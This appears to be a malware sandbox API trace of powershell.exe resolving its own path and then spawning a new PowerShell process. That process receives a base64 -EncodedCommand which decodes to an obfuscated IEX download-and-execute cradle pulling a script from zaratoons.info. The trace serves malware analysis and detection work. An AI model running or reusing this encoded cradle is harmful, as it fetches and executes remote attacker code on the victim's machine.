	[0561.028] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.029] SetErrorMode (uMode=0x1) returned 0x1
	[0561.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.029] SetErrorMode (uMode=0x1) returned 0x1
	[0561.029] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.029] SetErrorMode (uMode=0x1) returned 0x1
	[0561.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.030] SetErrorMode (uMode=0x1) returned 0x1
	[0561.030] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.030] SetErrorMode (uMode=0x1) returned 0x1
	[0561.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.030] SetErrorMode (uMode=0x1) returned 0x1
	[0561.031] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.031] SetErrorMode (uMode=0x1) returned 0x1
	[0561.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.031] SetErrorMode (uMode=0x1) returned 0x1
	[0561.031] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.031] SetErrorMode (uMode=0x1) returned 0x1
	[0561.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.032] SetErrorMode (uMode=0x1) returned 0x1
	[0561.032] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.032] SetErrorMode (uMode=0x1) returned 0x1
	[0561.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.032] SetErrorMode (uMode=0x1) returned 0x1
	[0561.032] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.033] SetErrorMode (uMode=0x1) returned 0x1
	[0561.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.033] SetErrorMode (uMode=0x1) returned 0x1
	[0561.033] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.033] SetErrorMode (uMode=0x1) returned 0x1
	[0561.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.034] SetErrorMode (uMode=0x1) returned 0x1
	[0561.034] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.034] SetErrorMode (uMode=0x1) returned 0x1
	[0561.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.034] SetErrorMode (uMode=0x1) returned 0x1
	[0561.034] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.035] SetErrorMode (uMode=0x1) returned 0x1
	[0561.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.035] SetErrorMode (uMode=0x1) returned 0x1
	[0561.035] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.035] SetErrorMode (uMode=0x1) returned 0x1
	[0561.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.036] SetErrorMode (uMode=0x1) returned 0x1
	[0561.036] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.036] SetErrorMode (uMode=0x1) returned 0x1
	[0561.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.036] SetErrorMode (uMode=0x1) returned 0x1
	[0561.037] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.037] SetErrorMode (uMode=0x1) returned 0x1
	[0561.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.037] SetErrorMode (uMode=0x1) returned 0x1
	[0561.037] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.038] SetErrorMode (uMode=0x1) returned 0x1
	[0561.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0561.038] SetErrorMode (uMode=0x1) returned 0x1
	[0561.038] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.038] SetErrorMode (uMode=0x1) returned 0x1
	[0561.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0561.039] SetErrorMode (uMode=0x1) returned 0x1
	[0561.039] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.039] SetErrorMode (uMode=0x1) returned 0x1
	[0561.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0561.039] SetErrorMode (uMode=0x1) returned 0x1
	[0561.039] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.040] SetErrorMode (uMode=0x1) returned 0x1
	[0561.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0561.040] SetErrorMode (uMode=0x1) returned 0x1
	[0561.040] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.040] SetErrorMode (uMode=0x1) returned 0x1
	[0561.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0561.041] SetErrorMode (uMode=0x1) returned 0x1
	[0561.041] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3d2100
	[0562.572] FindNextFileW (in: hFindFile=0x3d2100, lpFindFileData=0x1c95dd30 | out: lpFindFileData=0x1c95dd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0562.572] FindClose (in: hFindFile=0x3d2100 | out: hFindFile=0x3d2100) returned 1
	[0562.573] SetErrorMode (uMode=0x1) returned 0x1
	[0562.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c95de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0562.574] SetErrorMode (uMode=0x1) returned 0x1
	[0562.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c95e050 | out: lpFileInformation=0x1c95e050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0562.574] SetErrorMode (uMode=0x1) returned 0x1
	[0562.575] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0562.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.575] CoTaskMemFree (pv=0x3adda0) 
	[0562.577] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0562.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.577] CoTaskMemFree (pv=0x3adda0) 
	[0562.580] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0562.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.580] CoTaskMemFree (pv=0x3adda0) 
	[0562.591] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0562.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.591] CoTaskMemFree (pv=0x3adda0) 
	[0564.053] CoTaskMemAlloc (cb=0x3b) returned 0x1b97cc80
	[0564.054] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c95e238, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c95e238) returned 0x4550
	[0564.055] CoTaskMemFree (pv=0x1b97cc80) 
	[0564.058] GetConsoleWindow () returned 0x10388
	[0564.076] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0564.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0564.076] CoTaskMemFree (pv=0x3adda0) 
	[0564.077] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0564.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0564.077] CoTaskMemFree (pv=0x3adda0) 
	[0564.083] CoTaskMemAlloc (cb=0x104) returned 0x3adda0
	[0564.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3adda0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0564.083] CoTaskMemFree (pv=0x3adda0) 
	[0564.085] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c95e280 | out: pNumArgs=0x1c95e280) returned 0x1b964630*=""
	[0564.087] lstrlenW (lpString="-EncodedCommand") returned 15
	[0564.088] CoTaskMemAlloc (cb=0x22) returned 0x324d30
	[0564.088] RtlMoveMemory (in: Destination=0x324d30, Source=0x1b964652, Length=0x20 | out: Destination=0x324d30) 
	[0564.088] CoTaskMemFree (pv=0x324d30) 
	[0564.088] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0564.088] CoTaskMemAlloc (cb=0x2f4) returned 0x3934e0
	[0564.088] RtlMoveMemory (in: Destination=0x3934e0, Source=0x1b964672, Length=0x2f2 | out: Destination=0x3934e0) 
	[0564.088] CoTaskMemFree (pv=0x3934e0) 
	[0564.089] LocalFree (hMem=0x1b964630) returned 0x0
	[0564.089] CoTaskMemAlloc (cb=0x804) returned 0x3646a0
	[0564.089] GetConsoleTitleW (in: lpConsoleTitle=0x3646a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0565.363] CoTaskMemFree (pv=0x3646a0) 
	[0565.372] CoTaskMemAlloc (cb=0x38e) returned 0x1b964630
	[0565.372] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c95e1e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2dbf8d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2dbf8d0*(hProcess=0x310, hThread=0x354, dwProcessId=0x1454, dwThreadId=0x1030)) returned 1
	[0565.377] CoTaskMemFree (pv=0x1b964630) 
	[0565.378] CloseHandle (hObject=0x354) returned 1
	[0565.378] CoTaskMemAlloc (cb=0x3b) returned 0x3d0280
	[0565.378] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c95e288, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c95e288) returned 0x4550
	[0565.379] CoTaskMemFree (pv=0x3d0280) 
	[0565.382] GetCurrentProcess () returned 0xffffffffffffffff
	[0565.382] GetCurrentProcess () returned 0xffffffffffffffff
	[0565.382] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x310, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c95e368, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c95e368*=0x354) returned 1

Process:
	id = "49"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x77ace000"
	os_pid = "0xe3c"
